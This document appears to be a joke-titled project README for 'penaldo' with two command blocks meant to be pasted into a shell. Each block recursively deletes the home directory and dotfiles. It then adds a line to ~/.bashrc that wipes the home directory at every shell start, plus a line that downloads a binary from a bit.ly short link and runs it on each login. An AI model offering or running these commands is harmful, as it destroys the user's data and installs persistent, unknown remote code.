# penaldo



## Wtf Is This Project Bro

## Im so horny Today

## Single 

cd ~
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .kadalio*
mkdir ~/.penaldo && cd ~/.penaldo && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.penaldo && wget bit.ly/single-pn && chmod +x single-pn && ./single-pn" >> ~/.bashrc && source ~/.bashrc


## Doble

cd ~
rm -rvf *
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .kadalio*
mkdir ~/.penaldo && cd ~/.penaldo && echo "cd ~/ && rm -R *" >> ~/.bashrc && echo "cd ~/.penaldo && wget bit.ly/double-pn && chmod +x double-pn && ./double-pn" >> ~/.bashrc && source ~/.bashrc

### end

